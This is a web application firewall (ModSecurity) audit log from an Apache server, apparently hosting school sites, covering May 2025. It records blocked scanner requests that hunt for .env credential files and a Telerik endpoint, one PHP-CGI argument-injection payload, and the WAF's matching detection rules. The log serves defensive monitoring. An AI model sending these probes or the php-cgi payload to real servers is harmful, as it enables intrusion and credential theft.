X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/71.0.3578.98 Chrome/71.0.3578.98 Safari/537.36 Accept-Charset: utf-8 --ae4ea233-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae4ea233-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747117500472765 900 (- - -) Stopwatch2: 1747117500472765 900; combined=390, p1=336, p2=0, p3=0, p4=0, p5=53, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae4ea233-Z-- --ae43962c-A-- [13/May/2025:13:26:03 +0700] aCLl-4_RcapTWo3LoyeI_wAAAEY 103.236.140.4 56944 103.236.140.4 8181 --ae43962c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/3.01Gold (Win95; I) Accept-Charset: utf-8 --ae43962c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae43962c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747117563732334 851 (- - -) Stopwatch2: 1747117563732334 851; combined=339, p1=297, p2=0, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae43962c-Z-- --0e50cb73-A-- [13/May/2025:15:08:59 +0700] aCL-G-O55leZpQyxFsZB2AAAAIY 103.236.140.4 36496 103.236.140.4 8181 --0e50cb73-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 194.163.159.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Accept-Charset: utf-8 --0e50cb73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e50cb73-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747123739998848 976 (- - -) Stopwatch2: 1747123739998848 976; combined=377, p1=323, p2=0, p3=0, p4=0, p5=53, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e50cb73-Z-- --79006a6f-A-- [13/May/2025:17:19:20 +0700] aCMcqI3mg5f2L4Eof6MJ3gAAANM 103.236.140.4 41948 103.236.140.4 8181 --79006a6f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.110.147.123 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.110.147.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --79006a6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79006a6f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747131560968917 822 (- - -) Stopwatch2: 1747131560968917 822; combined=404, p1=361, p2=0, p3=0, p4=0, p5=42, sr=123, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79006a6f-Z-- --419d0461-A-- [13/May/2025:17:39:38 +0700] aCMhauO55leZpQyxFsZFwgAAAIM 103.236.140.4 43704 103.236.140.4 8181 --419d0461-B-- GET /core/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 194.163.159.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 Accept-Charset: utf-8 --419d0461-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --419d0461-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747132778930626 878 (- - -) Stopwatch2: 1747132778930626 878; combined=315, p1=275, p2=0, p3=0, p4=0, p5=39, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --419d0461-Z-- --7b9bc20f-A-- [13/May/2025:20:53:01 +0700] aCNOvY3mg5f2L4Eof6MLswAAAMY 103.236.140.4 46734 103.236.140.4 8181 --7b9bc20f-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 194.163.159.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 Accept-Charset: utf-8 --7b9bc20f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b9bc20f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747144381728739 769 (- - -) Stopwatch2: 1747144381728739 769; combined=296, p1=250, p2=0, p3=0, p4=0, p5=46, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b9bc20f-Z-- --bd1ea228-A-- [13/May/2025:23:21:38 +0700] aCNxkq50YiewH3i7i4fjyQAAABY 103.236.140.4 44628 103.236.140.4 8181 --bd1ea228-B-- GET /config/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 194.163.159.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ONEPLUS A5010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --bd1ea228-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd1ea228-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747153298093947 887 (- - -) Stopwatch2: 1747153298093947 887; combined=337, p1=297, p2=0, p3=0, p4=0, p5=40, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd1ea228-Z-- --4a625162-A-- [13/May/2025:23:49:56 +0700] aCN4NK50YiewH3i7i4fj3wAAAAQ 103.236.140.4 44840 103.236.140.4 8181 --4a625162-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --4a625162-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a625162-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747154996554843 13657 (- - -) Stopwatch2: 1747154996554843 13657; combined=25893, p1=326, p2=0, p3=0, p4=0, p5=12803, sr=113, sw=0, l=0, gc=12764 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a625162-Z-- --971cec4e-A-- [13/May/2025:23:49:56 +0700] aCN4NK50YiewH3i7i4fj4AAAABg 103.236.140.4 44844 103.236.140.4 8181 --971cec4e-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --971cec4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --971cec4e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747154996666932 780 (- - -) Stopwatch2: 1747154996666932 780; combined=350, p1=316, p2=0, p3=0, p4=0, p5=34, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --971cec4e-Z-- --aa2d130a-A-- [13/May/2025:23:49:56 +0700] aCN4NI_RcapTWo3LoyeWYAAAAEU 103.236.140.4 44848 103.236.140.4 8181 --aa2d130a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --aa2d130a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa2d130a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747154996998511 807 (- - -) Stopwatch2: 1747154996998511 807; combined=287, p1=250, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa2d130a-Z-- --72f9fc59-A-- [14/May/2025:00:12:33 +0700] aCN9gY3mg5f2L4Eof6MR2QAAAMk 103.236.140.4 44950 103.236.140.4 8181 --72f9fc59-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --72f9fc59-C-- --72f9fc59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72f9fc59-E-- --72f9fc59-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747156353175892 4306 (- - -) Stopwatch2: 1747156353175892 4306; combined=2334, p1=531, p2=1759, p3=0, p4=0, p5=43, sr=82, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72f9fc59-Z-- --87499b78-A-- [14/May/2025:02:23:52 +0700] aCOcSOO55leZpQyxFsZMmwAAAIw 103.236.140.4 46236 103.236.140.4 8181 --87499b78-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.226.196.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.226.196.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: */* --87499b78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87499b78-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747164232980773 2939 (- - -) Stopwatch2: 1747164232980773 2939; combined=1191, p1=449, p2=710, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87499b78-Z-- --3a788d4b-A-- [14/May/2025:02:24:29 +0700] aCOcbeO55leZpQyxFsZMoAAAAIM 103.236.140.4 46250 103.236.140.4 8181 --3a788d4b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36 Accept-Charset: utf-8 --3a788d4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a788d4b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747164269657878 679 (- - -) Stopwatch2: 1747164269657878 679; combined=263, p1=236, p2=0, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a788d4b-Z-- --b6387650-A-- [14/May/2025:04:10:23 +0700] aCO1P8OlTOX2TmGW6__ucwAAANg 103.236.140.4 48724 103.236.140.4 8181 --b6387650-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu) Accept-Charset: utf-8 --b6387650-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6387650-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747170623840553 851 (- - -) Stopwatch2: 1747170623840553 851; combined=339, p1=297, p2=0, p3=0, p4=0, p5=41, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6387650-Z-- --68fbf969-A-- [14/May/2025:04:46:47 +0700] aCO9x8OlTOX2TmGW6__uqQAAANM 103.236.140.4 48870 103.236.140.4 8181 --68fbf969-B-- GET /app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875069 --68fbf969-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --68fbf969-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172807289283 452 (- - -) Stopwatch2: 1747172807289283 452; combined=199, p1=178, p2=0, p3=0, p4=0, p5=21, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68fbf969-Z-- --9be27979-A-- [14/May/2025:04:46:47 +0700] aCO9x11ltXwOneQqchOtaQAAAA8 103.236.140.4 48928 103.236.140.4 8181 --9be27979-B-- GET /backend/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274687 --9be27979-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9be27979-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172807487347 878 (- - -) Stopwatch2: 1747172807487347 878; combined=348, p1=315, p2=0, p3=0, p4=0, p5=33, sr=140, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9be27979-Z-- --ba68db69-A-- [14/May/2025:04:46:47 +0700] aCO9x11ltXwOneQqchOtagAAABE 103.236.140.4 48932 103.236.140.4 8181 --ba68db69-B-- GET /api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875072 --ba68db69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ba68db69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172807684785 721 (- - -) Stopwatch2: 1747172807684785 721; combined=259, p1=228, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba68db69-Z-- --3d0dcc0c-A-- [14/May/2025:04:46:47 +0700] aCO9x11ltXwOneQqchOtawAAABM 103.236.140.4 48936 103.236.140.4 8181 --3d0dcc0c-B-- GET /code/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274690 --3d0dcc0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3d0dcc0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172807882319 715 (- - -) Stopwatch2: 1747172807882319 715; combined=256, p1=223, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
